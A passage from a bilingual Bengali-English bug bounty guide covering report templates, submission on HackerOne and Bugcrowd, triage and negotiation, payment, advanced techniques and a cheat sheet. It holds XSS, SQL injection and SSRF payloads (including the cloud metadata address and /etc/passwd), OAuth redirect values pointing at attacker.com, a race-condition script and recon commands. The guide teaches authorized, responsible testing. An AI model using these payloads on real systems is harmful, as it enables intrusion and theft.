payload in the bio field 📸 Screenshot: [attached - xss_poc_2.png] Shows the cookie received on attacker server 🎥 Video: [attached - xss_demo.mp4] Full demonstration of the attack HTTP Request: POST /api/profile/update HTTP/1.1 Host: app.example.com Content-Type: application/json Authorization: Bearer [token] {"bio": "<script>alert(document.domain)</script>"} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ IMPACT ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ An attacker can exploit this vulnerability to: • Steal session cookies of any user who views the profile • Perform actions on behalf of victims (account takeover) • Redirect victims to phishing pages • Log keystrokes (credential theft) • Spread worm-like to all visitors Affected users: ALL registered users of the platform ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ REMEDIATION / FIX RECOMMENDATION ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1. Implement proper output encoding/escaping for the bio field before rendering in HTML context 2. Use Content Security Policy (CSP) headers 3. Implement DOMPurify or similar HTML sanitization library 4. Set HttpOnly flag on session cookies Reference: https://owasp.org/www-community/attacks/xss/ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ Reported by: [Your HackerOne username] Test Environment: Only test account created by reporter No real user data was accessed during testing ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

📸 PoC Screenshot/Video Tips

📸 Screenshot Tips

URL address bar দেখিয়ে screenshot নাওTake screenshot showing URL address bar
Payload clearly visible রাখোKeep payload clearly visible
Response/Alert box দেখাওShow response/alert box
Annotate করো (arrow, highlight)Annotate with arrows and highlights

🎥 Video Tips

OBS বা Loom দিয়ে record করোRecord with OBS or Loom
শুরুতে Target URL দেখাওShow target URL at the start
প্রতিটি step clearly করোPerform each step clearly
Impact demonstrate করোDemonstrate the impact

📋 Report Template SummaryReport Template Summary

📌 Title — Vulnerability + Location + ImpactVulnerability + Location + Impact
📊 Severity + CVSS — স্বাধীনভাবে Calculate করোCalculate independently
📝 Steps — Numbered, ReproducibleNumbered, Reproducible
📸 PoC — Screenshot + Video + HTTP RequestScreenshot + Video + HTTP Request
💥 Impact — Worst Case ScenarioWorst Case Scenario
🔧 Remediation — Fix Suggestion + ReferenceFix Suggestion + Reference

Chapter 10

📤 Submission Process — কিভাবে Submit করেSubmission Process — How to Submit

HackerOne ও Bugcrowd-এ Bug Submit করার সম্পূর্ণ ধাপ-ধাপ গাইডComplete step-by-step guide to submitting bugs on HackerOne and Bugcrowd

🚀 HackerOne-এ Submit করার ধাপSteps to Submit on HackerOne

Program খুঁজে পাওFind the Program

hackerone.com/programs → পছন্দের program select করোSelect desired program

Scope ভালো করে পড়োRead Scope Carefully

Policy, In-scope, Out-of-scope, Exclusions সব পড়ো। তারপর Test করো।Read Policy, In-scope, Out-of-scope, Exclusions. Then test.

Bug Test ও Document করোTest Bug & Document It

Bug পেলে সাথে সাথে Screenshot/Video নাও। HTTP Request সেভ রাখো।When you find a bug, immediately take screenshots/video. Save the HTTP request.

Duplicate Check করোCheck for Duplicates

Hacktivity-তে similar bug আছে কিনা দেখো। Duplicate হলে Bounty পাবে না।Check Hacktivity for similar bugs. Duplicates won't get bounty.

"Submit Report" Click

Program page → "Submit Report" → Form পূরণ করোFill out the form

Form পূরণ করোFill Out the Form

Weakness: Bug type select করো (XSS, IDOR, etc.)Select bug type
Severity: তোমার Estimate দাওGive your estimate
Title: Clear ও specificClear and specific
Description: Template অনুযায়ী লেখোWrite following the template
Attachments: Screenshot/Video attach করোAttach screenshots/video

Submit করো এবং অপেক্ষা করোSubmit and Wait

Submit করার পর সাধারণত ৩–১৪ দিনের মধ্যে Response পাওয়া যায়।After submitting, typically get a response within 3–14 days.

⚠️ Submit করার আগে ChecklistPre-Submission Checklist

✅ Submit করার আগে এই সব নিশ্চিত করোConfirm all of these before submitting

☐ Bug টি Scope-এর মধ্যে আছেBug is within scope
☐ Bug টি Reproducible (আবার করা যায়)Bug is reproducible
☐ PoC Screenshot বা Video আছেPoC screenshot or video included
☐ HTTP Request/Response সংযুক্তHTTP Request/Response attached
☐ Title স্পষ্ট ও descriptiveTitle is clear and descriptive
☐ Impact section ভালো করে লেখা হয়েছেImpact section is well written
☐ Real user data access করা হয়নিNo real user data was accessed
☐ Hacktivity-তে Duplicate দেখেছোChecked Hacktivity for duplicates
☐ Remediation Suggestion আছেRemediation suggestion included

🔄 Submission এর পরে কী হয়?What Happens After Submission?

SUBMITTED │ ▼ NEW (Triage টিম দেখেনি এখনো) │ ▼ TRIAGED (Triage confirmed, Valid বলে মনে হচ্ছে) │ ├──→ DUPLICATE → আগে কেউ report করেছে, Bounty নেই ├──→ N/A → Not Applicable, Bug নয় বা Out of Scope ├──→ INFORMATIVE → Security issue কিন্তু Bounty নেই └──→ RESOLVED → Fix করা হয়েছে → 💰 BOUNTY PAID!

📤 Chapter সারসংক্ষেপChapter Summary

📋 Scope পড়া → Test → Document → Duplicate Check → SubmitRead scope → Test → Document → Duplicate Check → Submit
⚠️ Duplicate সবচেয়ে বড় সমস্যা — আগে Hacktivity check করোDuplicate is the biggest issue — check Hacktivity first
⏰ Submit করে ৩–১৪ দিন অপেক্ষা করো, spam করো নাAfter submitting, wait 3–14 days, don't spam

Chapter 11

💬 Triage, Communication ও NegotiationNegotiation

Report Triage হওয়ার পরে কী করবে, কিভাবে Professional থাকবে এবং Bounty Negotiate করবেWhat to do after triage, how to stay professional, and how to negotiate bounty

🏷️ Report Status বোঝাUnderstanding Report Status

Status	অর্থMeaning	তোমার করণীয়Your Action
New	Submitted, দেখা হয়নিSubmitted, not yet reviewed	অপেক্ষা করো (৩–৭ দিন)Wait (3–7 days)
Triaged	Valid, Fix হচ্ছেValid, being fixed	🎉 ভালো! অপেক্ষা করো🎉 Great! Wait
Resolved	Fix করা হয়েছেFixed	💰 Bounty পাবে!💰 You'll get bounty!
Duplicate	আগে report হয়েছেAlready reported	Accept করো, শেখোAccept, learn from it
N/A	Bug নয়, বা Out of ScopeNot a bug or out of scope	Politely জিজ্ঞেস করো কেনPolitely ask why
Informative	Issue কিন্তু Bounty নেইIssue but no bounty	Noted রাখো, next targetNote it, move to next target

💰 Bounty Negotiation

💡 কখন Negotiate করা যায়?When Can You Negotiate?

যদি মনে হয় Severity underrated করা হয়েছে — Politely, Professionally কথা বলো। Aggressive হওয়া যাবে না। If you feel the severity was underrated — speak politely and professionally. Never be aggressive.

# ভালো Negotiation Message Example "Hi [Program Name] Team, Thank you for triaging my report. I noticed the severity was marked as 'Medium'. I'd like to clarify the impact further: This vulnerability allows complete account takeover of any user without prior authentication, affecting all [X] million users. According to CVSS scoring, this would be rated High (7.5) due to: - Network-accessible attack vector - Low attack complexity - High confidentiality impact Could you please reconsider the severity? I'm happy to provide additional PoC if needed. Best regards, [Your username]"

✅ Professional CommunicationProfessional Communication

সবসময় Polite থাকোAlways be polite
Technical evidence দাওProvide technical evidence
CVSS দিয়ে justify করোJustify with CVSS
একবার appeal করোAppeal once

❌ কখনো করো নাNever Do This

Threatening message পাঠানোSend threatening messages
Public disclosure দিয়ে pressurePressure via public disclosure
Spam করাSpam messages
Abusive ভাষা ব্যবহারUse abusive language

💬 Chapter সারসংক্ষেপChapter Summary

⏰ Triaged মানে ভালো খবর — Bounty আসছেTriaged means good news — bounty coming
💰 Negotiate করো Technical Evidence দিয়ে, emotion দিয়ে নাNegotiate with technical evidence, not emotion
🤝 Professional থাকাই দীর্ঘমেয়াদে সবচেয়ে লাভজনকStaying professional is most beneficial long-term

Chapter 12

💰 Bounty পাওয়া, Payment ও Hall of FameGetting Paid, Payment & Hall of Fame

বাংলাদেশ থেকে Bounty কিভাবে পাবে, Tax, CVE এবং Hall of FameHow to receive bounties from Bangladesh, Tax, CVE, and Hall of Fame

💳 Payment Methods

Method	Platform	বাংলাদেশেIn Bangladesh	সুবিধাPros
PayPal	HackerOne, Bugcrowd	⚠️ সীমিতLimited	দ্রুত, globalFast, global
Bank Transfer (SWIFT)	HackerOne, Bugcrowd	✅ কাজ করেWorks	সরাসরি Bank-এDirectly to bank
Payoneer	HackerOne	✅ ভালো optionGood option	বাংলাদেশে PopularPopular in BD
Crypto (BTC/ETH)	কিছু ProgramSome programs	⚠️ Legal দেখোCheck legal	AnonymousAnonymous
Swag / Gift	VDP Programs	📦	T-shirt, Merch, CertificateT-shirt, Merch, Certificate

🇧🇩 বাংলাদেশ থেকে Bounty পাওয়ার সবচেয়ে ভালো পদ্ধতিBest Way to Receive Bounties from Bangladesh

Payoneer Account খোলো (payoneer.com) — বিনামূল্যেOpen Payoneer account (payoneer.com) — free
HackerOne-এ Payoneer connect করোConnect Payoneer to HackerOne
Payoneer → bKash/Nagad অথবা Bank Transfer করোTransfer from Payoneer → bKash/Nagad or Bank

🏆 Hall of Fame ও CVE

🏆 Hall of Fame

অনেক Company তাদের Website-এ Bug Reporter-দের নাম Hall of Fame-এ রাখে। এটা Portfolio-র জন্য অনেক দামি।Many companies list bug reporters on their Hall of Fame page. This is very valuable for your portfolio.

Google — bughunters.google.com
Facebook — whitehat.fb.com
Microsoft — msrc.microsoft.com
Apple — support.apple.com/security

📋 CVE (Common Vulnerabilities)

যদি Open Source Software-এ Bug পাও, CVE ID পাওয়া সম্ভব। এটা LinkedIn/Resume-এ যোগ করা যায়।If you find bugs in open source software, you can get a CVE ID — great for your LinkedIn/resume.

cve.mitre.org
nvd.nist.gov

💰 Chapter সারসংক্ষেপChapter Summary

🇧🇩 Payoneer + SWIFT Bank Transfer = বাংলাদেশে সেরা OptionPayoneer + SWIFT Bank Transfer = best option in Bangladesh
🏆 Hall of Fame = Free Reputation + PortfolioHall of Fame = Free Reputation + Portfolio
📋 CVE পাওয়া Career-এর জন্য খুব ভালোGetting a CVE is great for your career

Chapter 13

🚀 Advanced Techniques ও Tips

Chained Bugs, Business Logic, GraphQL, OAuth, Race Condition — উন্নত কৌশলChained Bugs, Business Logic, GraphQL, OAuth, Race Conditions — advanced techniques

⛓️ Bug Chaining — বেশি Bounty পাওয়ার কৌশলStrategy for Higher Bounty

💡 Bug Chaining কী?

একটি Low severity bug-কে আরেকটি Low বা Medium bug-এর সাথে মিলিয়ে High বা Critical করা। এতে বেশি Bounty পাওয়া যায়। Combining a low severity bug with another low or medium bug to create a high or critical impact. This results in higher bounty.

Example Chain: Account Takeover Open Redirect (Low) + CSRF (Medium) + Oauth State Not Validated (Medium) = Account Takeover = CRITICAL 💰💰💰 Another Chain: SSRF (blocked by WAF) + Internal IP Bypass = SSRF → RCE = Critical Bounty!

🧠 Business Logic Flaws

# Business Logic Test Examples # 1. Negative Price POST /cart/add {"item_id": 123, "quantity": -1, "price": -99.99} # দোকান থেকে পয়সা নেওয়া যাচ্ছে? # 2. Discount Code Reuse GET /apply-coupon?code=SAVE50 # একই code বারবার use # 3. Race Condition (দুটো request একসাথে) # Python example import threading import requests def redeem(): requests.post('/redeem', data={'points': 1000}) for _ in range(10): threading.Thread(target=redeem).start() # একটি request হওয়ার কথা কিন্তু 10টা হলো? # 4. 2FA Bypass # 2FA step skip করে সরাসরি dashboard-এ যাওয়ার চেষ্টা GET /dashboard # 2FA complete না করেই

🔵 GraphQL Testing

# GraphQL Introspection (disabled হওয়া উচিত) POST /graphql {"query": "{__schema{types{name}}}"} # IDOR in GraphQL query { user(id: "OTHER_USER_ID") { email, phone, address } } # Batch Query Attack (Rate Limiting Bypass) [ {"query": "mutation { login(user:'a', pass:'aa') }"}, {"query": "mutation { login(user:'a', pass:'ab') }"}, ... (1000 queries at once) ]

🔑 OAuth Flaws

# OAuth State Parameter Missing GET /oauth/callback?code=AUTH_CODE # state parameter নেই? CSRF attack possible! # Redirect URI Manipulation GET /oauth/authorize?redirect_uri=https://attacker.com GET /oauth/authorize?redirect_uri=https://example.com@attacker.com GET /oauth/authorize?redirect_uri=https://example.com.attacker.com # Token Leakage via Referer # access_token URL parameter হলে Referer header-এ leak হয়

🚀 Chapter সারসংক্ষেপChapter Summary

⛓️ Bug Chain = Low + Low = High/Critical BountyBug Chain = Low + Low = High/Critical Bounty
🧠 Business Logic Bugs খুঁজতে "Normal Flow" বাইরে চিন্তা করোTo find business logic bugs, think outside the "normal flow"
⚡ Race Condition অনেক valuable bug যা অনেকেই miss করেRace Condition is a very valuable bug that many miss

Chapter 14

📚 Career Path, Resources ও Cheat Sheet

শেখার Resources, Career Path এবং সম্পূর্ণ Bug Bounty Cheat SheetLearning resources, career path, and complete Bug Bounty Cheat Sheet

🎓 সেরা শেখার ResourcesBest Learning Resources

🆓 Free

PortSwigger Web Academy
OWASP Testing Guide
HackTheBox (Free)
TryHackMe (Free)
YouTube: NahamSec, STÖK
PentesterLab (Free)

💰 Paid

HackTheBox Pro
TCM Security courses
Udemy courses
Bug Bounty Bootcamp (Vickie Li)
Offensive Security (OSCP)

📖 Books

The Web Application Hacker's Handbook
Bug Bounty Bootcamp — Vickie Li
Real World Bug Hunting
Hacking APIs

🗺️ Career Path

📗

Month 1–3: Foundation

PortSwigger Labs, OWASP Top 10, Burp Suite শেখোPortSwigger Labs, OWASP Top 10, Burp Suite

PortSwigger TryHackMe HTTP Basics

⬇

📘

Month 4–6: First Bugs

VDP ও Public Program-এ শুরু করো, প্রথম Bug Submit করোStart on VDP and public programs, submit first bug

HackerOne First Report VDP

⬇

📙

Month 7–12: First Bounty

Paid program-এ যাও, Automation শেখো, প্রথম Bounty পাওMove to paid programs, learn automation, get first bounty

First $$$ Automation Nuclei

⬇

📕

Year 2+: Full Time Hunter

Private Program, Top 100 Hacker, $10K+/monthPrivate Programs, Top 100 Hacker, $10K+/month

Private Program Top Hacker Full Time

📋 সম্পূর্ণ Cheat SheetComplete Cheat Sheet

🔴 XSS Payloads

Basic XSS

Image tag XSS

SVG XSS

javascript:alert(1)

URI XSS

"><script>alert(1)</script>

Attribute escape

🟣 SQLi Payloads

' OR '1'='1'--

Auth bypass

1 UNION SELECT null--

Union test

1' ORDER BY 3--

Column count

'; WAITFOR DELAY '0:0:5'--

Time-based (MSSQL)

1' AND SLEEP(5)--

Time-based (MySQL)

🔵 SSRF Payloads

http://127.0.0.1/

Localhost

http://169.254.169.254/

AWS metadata

http://0x7f000001/

Hex bypass

http://[::1]/

IPv6 bypass

file:///etc/passwd

File read

🟢 Recon Commands

subfinder -d target.com

Subdomain enum

httpx -l subs.txt

Live host check

ffuf -w list.txt -u URL/FUZZ

Dir brute

gau target.com | gf xss

XSS URLs

nuclei -u target.com -t cves/

CVE scan

🏆 সফল Bug Hunter-দের TipsTips from Successful Bug Hunters

🎯 Focus করো: একটা bug type ভালো করে শেখো, তারপর আরেকটায় যাওFocus: Learn one bug type well, then move to the next
📝 Notes রাখো: প্রতিটি Program-এর কী দেখলে তা লিখে রাখোTake notes: Document what you find in each program
🔄 Consistency: প্রতিদিন কিছু না কিছু করোConsistency: Do something every day
📖 Writeup পড়ো: HackerOne Hacktivity ও Medium-এ writeup পড়োRead writeups: Read on HackerOne Hacktivity and Medium
🤝 Community: Discord, Twitter (X)-এ active থাকোCommunity: Stay active on Discord, Twitter (X)
🏃 হাল ছেড়ো না: প্রথম দিকে Duplicate ও N/A পাওয়া স্বাভাবিকDon't give up: Getting duplicates and N/As early is normal

🎯 "Every great hacker was once a beginner who didn't give up."

এই গাইড সম্পূর্ণ শিক্ষামূলক। সবসময় Authorized Program-এ কাজ করো এবং Responsible Disclosure অনুসরণ করো। This guide is entirely educational. Always work on authorized programs and follow responsible disclosure.

Bug Bounty Hunting v2.0 — সম্পূর্ণ বাংলা গাইডComplete Bilingual Guide

14 Chapters • Bilingual • Dark Mode • Full Template

বাগ বাউন্টি হান্টিং — সম্পূর্ণ বাংলা গাইড Bug Bounty Hunting — Complete Bilingual Guide